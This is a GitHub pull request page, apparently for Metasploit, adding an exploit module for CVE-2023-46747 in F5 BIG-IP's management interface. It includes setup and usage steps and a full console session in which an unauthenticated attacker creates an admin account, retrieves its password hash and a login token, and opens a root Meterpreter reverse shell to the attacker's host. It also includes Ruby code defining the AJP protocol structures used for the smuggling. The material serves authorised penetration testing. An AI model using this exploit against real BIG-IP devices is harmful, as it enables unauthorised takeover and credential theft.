Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,77 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| ### Description | ||
|
|
||
| This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, | ||
| unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to | ||
| execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are | ||
| created. | ||
|
|
||
| Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4. | ||
|
|
||
| ### Setup | ||
|
|
||
| Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software. | ||
|
|
||
| The target does not need to be licensed to be vulnerable. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Install the application | ||
| 2. Start msfconsole | ||
| 3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747` | ||
| 4. Set the `RHOST`, `PAYLOAD` and payload-related options | ||
| 5. Do: `run` | ||
| 6. You should get a shell. | ||
|
|
||
| ## Targets | ||
|
|
||
| ### Command | ||
|
|
||
| This executes an OS command on the target device. | ||
|
|
||
| ## Options | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### F5 BIG-IP 17.0.0.1-0.0.4 | ||
|
|
||
| ``` | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32 | ||
| RHOSTS => 192.168.159.32 | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp | ||
| PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 | ||
| LHOST => 192.168.159.128 | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check | ||
| [+] 192.168.159.32:443 - The target is vulnerable. | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.159.128:4444 | ||
| [+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS | ||
| [+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10 | ||
| [*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA | ||
| [*] Sending stage (24768 bytes) to 192.168.159.32 | ||
| [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: root | ||
| meterpreter > sysinfo | ||
| Computer : f5test2.home.lan | ||
| OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022 | ||
| Architecture : x64 | ||
| Meterpreter : python/linux | ||
| meterpreter > pwd | ||
| /var/service/restjavad | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds | ||
| Credentials | ||
| =========== | ||
|
|
||
| host origin service public private realm private_type JtR Format cracked_password | ||
| ---- ------ ------- ------ ------- ----- ------------ ---------- ---------------- | ||
| 192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt | ||
|
|
||
| msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,127 @@ | ||
| # -*- coding: binary -*- | ||
|
|
||
| require 'bindata' | ||
|
|
||
| # @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html | ||
| module Rex::Proto::ApacheJP | ||
adfoster-r7 marked this conversation as resolved.
Show resolved
Hide resolved
|
||
| class ApacheJPBoolean < BinData::Primitive | ||
| endian :big | ||
|
|
||
| uint8 :data | ||
|
|
||
| def get | ||
| self.data != 0 | ||
| end | ||
|
|
||
| def set(v) | ||
| self.data = v ? 1 : 0 | ||
| end | ||
| end | ||
|
|
||
| class ApacheJPString < BinData::Primitive | ||
| endian :big | ||
|
|
||
| uint16 :len, value: -> { data.length } | ||
| stringz :data | ||
|
|
||
| def get | ||
| self.data | ||
| end | ||
|
|
||
| def set(v) | ||
| self.data = v | ||
| end | ||
| end | ||
|
|
||
| class ApacheJPReqHeaderName < BinData::Primitive | ||
| COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent } | ||
| endian :big | ||
|
|
||
| uint16 :len_or_code | ||
| stringz :data, onlyif: -> { len_or_code < 0xa000 } | ||
|
|
||
| def get | ||
| if len_or_code >= 0xa000 | ||
| COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1] | ||
| else | ||
| self.data | ||
| end | ||
| end | ||
|
|
||
| def set(v) | ||
| if (idx = COMMON_HEADERS.index(v)) | ||
| self.len_or_code = 0xa000 | (idx + 1) | ||
| else | ||
| raise RuntimeError if v.length >= 0xa000 | ||
|
|
||
| self.len_or_code = v.length | ||
| self.data = v | ||
| end | ||
| end | ||
| end | ||
|
|
||
| class ApacheJPRequestHeader < BinData::Record | ||
| endian :big | ||
|
|
||
| apache_jp_req_header_name :header_name | ||
| apache_jp_string :header_value | ||
| end | ||
|
|
||
| class ApacheJPRequestAttribute < BinData::Record | ||
| CODE_CONTEXT = 1 | ||
| CODE_SERVLET_PATH = 2 | ||
| CODE_REMOTE_USER = 3 | ||
| CODE_AUTH_TYPE = 4 | ||
| CODE_QUERY_STRING = 5 | ||
| CODE_JVM_ROUTE = 6 | ||
| CODE_SSL_CERT = 7 | ||
| CODE_SSL_CIPHER = 8 | ||
| CODE_SSL_SESSION = 9 | ||
| CODE_REQ_ATTRIBUTE = 10 | ||
| CODE_TERMINATOR = 0xff | ||
|
|
||
| endian :big | ||
|
|
||
| uint8 :code | ||
| apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR } | ||
| end | ||
|
|
||
| class ApacheJPForwardRequest < BinData::Record | ||
| HTTP_METHOD_OPTIONS = 1 | ||
| HTTP_METHOD_GET = 2 | ||
| HTTP_METHOD_HEAD = 3 | ||
| HTTP_METHOD_POST = 4 | ||
| HTTP_METHOD_PUT = 5 | ||
| HTTP_METHOD_DELETE = 6 | ||
| HTTP_METHOD_TRACE = 7 | ||
| HTTP_METHOD_PROPFIND = 8 | ||
| HTTP_METHOD_PROPPATCH = 9 | ||
| HTTP_METHOD_MKCOL = 10 | ||
| HTTP_METHOD_COPY = 11 | ||
| HTTP_METHOD_MOVE = 12 | ||
| HTTP_METHOD_LOCK = 13 | ||
| HTTP_METHOD_UNLOCK = 14 | ||
| HTTP_METHOD_ACL = 15 | ||
| HTTP_METHOD_REPORT = 16 | ||
| HTTP_METHOD_VERSION_CONTROL = 17 | ||
| HTTP_METHOD_CHECKIN = 18 | ||
| HTTP_METHOD_CHECKOUT = 19 | ||
| HTTP_METHOD_UNCHECKOUT = 20 | ||
| HTTP_METHOD_SEARCH = 21 | ||
|
|
||
| endian :big | ||
|
|
||
| uint8 :prefix_code, value: 2 | ||
| uint8 :http_method | ||
| apache_jp_string :protocol, initial_value: 'HTTP/1.1' | ||
| apache_jp_string :req_uri | ||
| apache_jp_string :remote_addr | ||
| apache_jp_string :remote_host | ||
| apache_jp_string :server_name | ||
| uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 } | ||
| apache_jp_boolean :is_ssl, initial_value: false | ||
| uint16 :num_headers, initial_value: -> { headers.length } | ||
| array :headers, type: :apache_jp_request_header, initial_length: :num_headers | ||
| array :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR } | ||
| end | ||
| end | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not a blocker; Potentially putting a waybackmachine link here would help future travellers 👀
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
https://web.archive.org/web/20231106223828/https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html